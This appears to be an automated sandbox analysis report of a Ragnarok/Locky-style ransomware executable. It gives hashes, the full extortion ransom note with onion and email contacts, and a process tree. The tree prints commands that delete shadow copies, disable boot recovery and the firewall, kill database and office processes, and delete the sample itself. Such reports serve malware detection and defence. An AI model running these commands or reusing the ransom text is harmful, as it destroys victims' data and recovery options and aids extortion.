Analysis

  • max time kernel
    122s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags
    arch:x64
    arch:x86
    image:win7-20230831-en
    locale:en-us
    os:windows7-x64
    system
  • submitted
    18-09-2023 18:43

General

  • Target

    b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe_JC.exe

  • Size

    169KB

  • MD5

    98562209465bec53327e65649a2b8829

  • SHA1

    3a47656ed3df213bd934aa01078a863568fe9f2b

  • SHA256

    b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe

  • SHA512

    c11ce14f9cb75df2bc9bd81971c1f8fa885815715f389eb8e796e0f657de59756b36a6f896c216a03c7be7bb3ddff9b8a47aee71146760e4f4d9c6bdc0ff2cc3

  • SSDEEP

    3072:iFgiMd04bHHr/QFDtaruNyXgs7WL61fXbEiVkYELY2P+gA/PF:UE3bHL/ngsu61kYELNmhF

Malware Config

Extracted

Path

C:\Users\Admin\Documents\!!Read_Me.56322.html

Ransom Note
<!DOCTYPE html><h1>#ALL YOUR FILES ARE ENCRYPTED AND STOLEN BY RAGNAROK</h1>Dear Sir<br><br>Your files are encrypted with RSA4096 and AES encryption algorithm. <br>But don't worry, you can return all your files!! follow the instructions to recover your files <br><br>Cooperate with us and get the decrypter program as soon as possible will be your best solution.<br>Only our software can decrypt all your encrypted files.<br><br>What guarantees you have?<br>We take our reputation seriously. We reject any form of deception</br>You can send one of your encrypted file from your PC and we decrypt it for free. <br>But we can decrypt only 1 file for free. File must not contain any valuable information.<br>When hiring third-party negotiators or recovery companies. listen to what they tell you. try to think.<br> Are they really interested in solving your problems or are they just thinking about their profit and ambitions?<br><br>By the way.We have stolen lots of your company and your private data which includes doc,xls,pdf,jpg,mdf,sql,pst...<br>Here we upload sample files of your company and your private data on our blog :<br>http://wobpitin77vdsdiswr43duntv6eqw4rvphedutpaxycjdie6gg3binad.onion<br>We promise that if you don't pay within a week, we will package and publish all of your company and your data on our website.<br>We also promise we can decrypt all of your data and delete all your files on internet after your payment.<br>Such leaks of information lead to losses for the company. fines and lawsuits. And don't forget that information can fall into the hands of competitors!<br>For us this is just business and to prove to you our seriousness.<br><br>Our e-mail:<br> [email protected]<br><br> Reserve e-mail:<br>[email protected]<br>[email protected]<br><br>Device ID:<br>
Emails

  • [email protected]
  • [email protected]
  • [email protected]

Signatures

  • Locky

    Ransomware strain released in 2016, with advanced features like anti-analysis.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (149) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 13 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 56 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe_JC.exe
    "C:\Users\Admin\AppData\Local\Temp\b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe_JC.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1768
    • C:\Windows\system32\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:832
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:2688
    • C:\Windows\system32\cmd.exe
      cmd.exe /c wmic shadowcopy delete /nointeractive
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3068
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete /nointeractive
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2820
    • C:\Windows\system32\cmd.exe
      cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {current} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2644
    • C:\Windows\system32\cmd.exe
      cmd.exe /c bcdedit /set {current} recoveryenabled no
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2636
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {current} recoveryenabled no
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2824
    • C:\Windows\system32\cmd.exe
      cmd.exe /c netsh advfirewall set allprofiles state off
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2908
      • C:\Windows\system32\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        PID:3056
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im note*
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1492
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im note*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3012
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im powerpnt*
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1888
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im powerpnt*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2720
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im winword*
      2⤵
      PID:1348
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im winword*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2500
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im excel*
      2⤵
      PID:2164
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im excel*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1992
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im Exchange*
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1884
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im Exchange*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2828
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im sql*
      2⤵
      PID:212
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im sql*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1652
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im mys*
      2⤵
      PID:1972
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im mys*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1960
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im post*
      2⤵
      PID:2012
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im post*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1312
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im vee*
      2⤵
      PID:1032
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im vee*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2704
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im python*
      2⤵
      PID:800
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im python*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1980
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im java*
      2⤵
      PID:2008
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im java*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2116
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im apache*
      2⤵
      PID:748
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im apache*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1284
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im tomcat*
      2⤵
      PID:1588
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im tomcat*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1432
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c ping 127.0.0.1>nul & del /q C:\Users\Admin\AppData\Local\Temp\b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe_JC.exe
      2⤵
      • Deletes itself
      PID:2744
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1616
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2700

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\Documents\!!Read_Me.56322.html

    Filesize

    4KB

    MD5

    c0db3a023290d1204a6a8a26bb9360da

    SHA1

    f8ff6d2e8dda81e854128ec41148f372c5c514d3

    SHA256

    1f48dad202a89e13a5325e608c7daaa6910982184f334b69f2500724f1a17771

    SHA512

    caa8eddab5c7037ccbe474fb939c681e6a5a3b638e6a5d7129ea4d5dd0780a083ee78210f4b000195109ce1f9a38bdc7cace5475919e6260561c1242ba2faba0

  • memory/1768-0-0x0000000010000000-0x000000001001C000-memory.dmp

    Filesize

    112KB